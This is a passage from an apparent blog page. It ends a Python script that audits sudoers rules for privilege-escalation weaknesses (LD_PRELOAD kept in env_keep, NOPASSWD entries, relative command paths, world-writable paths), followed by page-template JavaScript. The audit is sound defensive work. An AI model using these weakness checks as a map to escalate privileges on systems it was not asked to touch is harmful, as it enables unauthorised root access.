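                rules.append({"users": users, "hosts": parts[1],
                              "runas": runas.group(1) if runas else "root",
                              "nopasswd": nopasswd, "command": command})
    return env_keep, rules


def audit(text, user, groups=()):
    """Return (check, detail) findings for the rules that apply to `user`."""
    env_keep, rules = parse_sudoers(text)
    principals = {user, "ALL"} | {"%" + group for group in groups}
    mine = [rule for rule in rules if principals & set(rule["users"])]
    findings = []
    if mine and "LD_PRELOAD" in env_keep:
        findings.append(("env_keep", "LD_PRELOAD"))
    for rule in mine:
        argv = rule["command"].split()
        if rule["nopasswd"]:
            findings.append(("nopasswd", rule["command"]))
        # sudoers(5) describes a command name as a fully qualified file name.
        if argv[0] not in ("ALL", "sudoedit") and not argv[0].startswith("/"):
            findings.append(("not-absolute", rule["command"]))
        if any(token.startswith(WORLD_WRITABLE_DIRS) for token in argv):
            findings.append(("world-writable-path", rule["command"]))
    return findings


if __name__ == "__main__":
    for check, detail in audit(SAMPLE_SUDOERS, "admin"):
        print(f"{check:20} {detail}")
```

The directory-prefix test stands in for a real permission check; on a live host, replace it with `os.access(path, os.W_OK)` run as the account being reviewed.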
Reviewed by 0x000216 on Monday, July 23, 2018. Rating: 5
var h = '<div class="related">'; for (var i = 0; i < e.feed.entry.length; i++) { for (var j = 0; j < e.feed.entry[i].link.length; j++) { if (e.feed.entry[i].link[j].rel == "alternate") { u = e.feed.entry[i].link[j].href; break } } var g = e.feed.entry[i].title.$t; var c = e.feed.entry[i].content.$t; var $c = $('<div>').html(c); if (c.indexOf("//www.youtube.com/embed/") > -1) { var p = e.feed.entry[i].media$thumbnail.url; var k = p } else if (c.indexOf("<img") > -1) { var q = $c.find('img:first').attr('src'); var k = q } else { var k = NO_IMAGE } h += '<li><div class="related-thumb"><a class="related-img" href="' + u + '" style="background:url(' + k + ') no-repeat center center;background-size: cover"/></div><h3 class="related-title"><a href="' + u + '">' + g + '</a></h3></li>' } h += '</div><div class="clear"/>'; $(".related-ready").html(h); $('.related-img').each(function() { $(this).attr('style', function(i, src) { return src.replace('/default.jpg', '/hqdefault.jpg') }).attr('style', function(i, src) { return src.replace('s72-c', 's1600') }) }) } }) }); window.onload = function() { var e = document.getElementById("mycontent"); if (e == null) { window.location.href = "https://nexus-decode.blogspot.com/" } e.setAttribute("href", "https://nexus-decode.blogspot.com/"); e.setAttribute("ref", "dofollow"); e.setAttribute("title", "Blogger Templates"); e.setAttribute("style", "display: inline-block!important; font-size: inherit!important; color: #888!important; visibility: visible!important; opacity: 1!important;"); e.innerHTML = "Nexus" } //]]> </script> <script type='text/javascript'> var postperpage=POST_PER_PAGE; var numshowpage=5; var upPageWord ='Prev'; var downPageWord ='Next'; var urlactivepage=location.href; var home_page="/"; </script> <div class='back-to-top'> <a href='#' id='back-to-top' title='Back to Top'><i class='fa fa-long-arrow-up'></i></a> </div> <!-- </body>--></body> </html>